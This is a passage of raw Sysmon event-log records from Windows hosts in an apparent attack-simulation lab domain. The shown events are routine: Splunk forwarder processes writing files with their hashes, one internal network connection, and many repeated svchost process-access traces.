Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084137Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.552{2FDD8D40-B5D0-615A-B001-00000000FD01}680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000084136Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.536{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F8A848B1D995DAA1E7DB711055B7AD0,SHA256=962B99A9F177401FFB423A037CC3384D09CB7885032B8CDF4EC24D997BD1534C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:37.650{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68AAB3049EDCAEC55860DB9D00979F6,SHA256=C0B30E1195801BC2741C98BB57033AC8CE54B093D9A1AE76BCE1D234DA4C7466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084152Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:37.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA264A77D524A8523F5E7A93C0109A43,SHA256=A888EDC7F98E71D2E56051D262ABC5CC1B6FF6EB98C70C83F0B6CC6CC337EC0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084151Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:37.114{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9A71CF3AF1398F70256B6B0007FCD7A,SHA256=1AB70E826BE51CF202A393C4316B830EAFCCD4A08F7E963C701119BD5E4F592F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:38.683{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2389307433162200E2877E7AF3D1589,SHA256=9C006ADED6B1DE81541885EC53263FF2C98EE9026B0C979ADFC25B4C5353593A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084153Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:38.176{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C183DB8E112A4EF32578D8AD3549A09,SHA256=F77EE55429FA0C670FFB314692A0B1C17C29BA656B99B3E875F08E845D497CBD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:38.465{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51980-false10.0.1.12-8000- 23542300x8000000000000000108623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:39.702{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007000CEDF3650BCD23814436CDC5767,SHA256=BDC0C41BC6DE0DDB9DF0075013AFA84F2E4A0B2341F62AAADA07FA24F2C54583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084154Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:39.223{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60EF0B43E98640A29F44C42733CA0715,SHA256=E1654C490D67F2CCCC341FB633DFEDF09B08C912EF4B732AD833D381A5C27A0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 